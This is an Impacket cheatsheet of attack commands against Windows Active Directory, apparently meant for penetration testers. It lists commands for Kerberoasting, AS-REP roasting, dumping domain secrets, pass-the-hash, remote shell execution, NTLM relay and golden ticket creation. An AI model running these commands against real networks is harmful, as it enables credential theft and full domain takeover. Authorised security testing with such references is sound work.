
Impacket Cheatsheet



Impacket is a collection of Python classes for working with network protocols. It provides tools for SMB, MSRPC, LDAP, Kerberos, and more, and is essential for Windows network security testing and Active Directory exploitation.


Common Tools

  • GetNPUsers.py - AS-REP Roasting
  • GetUserSPNs.py - Kerberoasting
  • secretsdump.py - Dump secrets
  • psexec.py - Remote execution
  • smbclient.py - SMB client
  • smbserver.py - SMB server
  • wmiexec.py - WMI execution
  • atexec.py - Task scheduler execution
  • dcomexec.py - DCOM execution
  • lookupsid.py - SID enumeration
  • rpcdump.py - RPC endpoint dump
  • samrdump.py - SAM dump
  • ntlmrelayx.py - NTLM relay
  • ticketConverter.py - Convert tickets
  • ticketer.py - Create tickets

AS-REP Roasting

  • GetNPUsers.py domain/ - List vulnerable users
  • GetNPUsers.py domain/user:pass - Authenticated
  • GetNPUsers.py -dc-ip 10.10.10.10 domain/ - Specify DC
  • GetNPUsers.py -request domain/ - Request tickets
  • GetNPUsers.py -format hashcat domain/ - Hashcat format

Kerberoasting

  • GetUserSPNs.py domain/user:pass - Get SPNs
  • GetUserSPNs.py -dc-ip 10.10.10.10 domain/user:pass - Specify DC
  • GetUserSPNs.py -request domain/user:pass - Request tickets
  • GetUserSPNs.py -outputfile hashes.txt domain/user:pass - Save hashes

Secrets Dumping

  • secretsdump.py domain/user:pass@target - Dump secrets
  • secretsdump.py -hashes :hash domain/user@target - Pass-the-hash
  • secretsdump.py -just-dc domain/user:pass@target - Domain cache
  • secretsdump.py -just-dc-ntlm domain/user:pass@target - NTLM only
  • secretsdump.py -just-dc-user user domain/user:pass@target - Specific user

Remote Execution

  • psexec.py domain/user:pass@target - PsExec
  • wmiexec.py domain/user:pass@target - WMI execution
  • atexec.py domain/user:pass@target - Task scheduler
  • dcomexec.py domain/user:pass@target - DCOM execution
  • smbexec.py domain/user:pass@target - SMB execution

SMB Operations

  • smbclient.py domain/user:pass@target - SMB client
  • smbclient.py -hashes :hash domain/user@target - Pass-the-hash
  • smbserver.py SHARE /path - Start SMB server
  • smbserver.py -username user -password pass SHARE /path - Authenticated

Common Examples

AS-REP Roasting

GetNPUsers.py domain.local/ -dc-ip 10.10.10.10

Find users with pre-auth disabled.

Kerberoasting

GetUserSPNs.py domain.local/user:pass -request

Request service tickets for cracking.

Dump Secrets

secretsdump.py domain.local/user:pass@10.10.10.10

Extract credentials from target.

Pass-the-Hash

psexec.py -hashes :aad3b435b51404ee domain/user@target

Authenticate with hash.

Remote Shell

psexec.py domain/user:pass@target

Get interactive shell.

SMB Client

smbclient.py domain/user:pass@target

Access SMB shares.

NTLM Relay

ntlmrelayx.py -tf targets.txt -smb2support

Relay NTLM authentication.

Create Ticket

ticketer.py -nthash hash -domain-sid SID -domain domain.local administrator

Create golden ticket.


Tips

  • Use GetNPUsers for AS-REP roasting
  • Use GetUserSPNs for Kerberoasting
  • secretsdump is powerful for credential extraction
  • Multiple execution methods available (psexec, wmiexec, etc.)
  • Use -hashes for pass-the-hash attacks
  • Essential for AD security testing
  • Many tools support Kerberos authentication
  • Check documentation for specific protocol details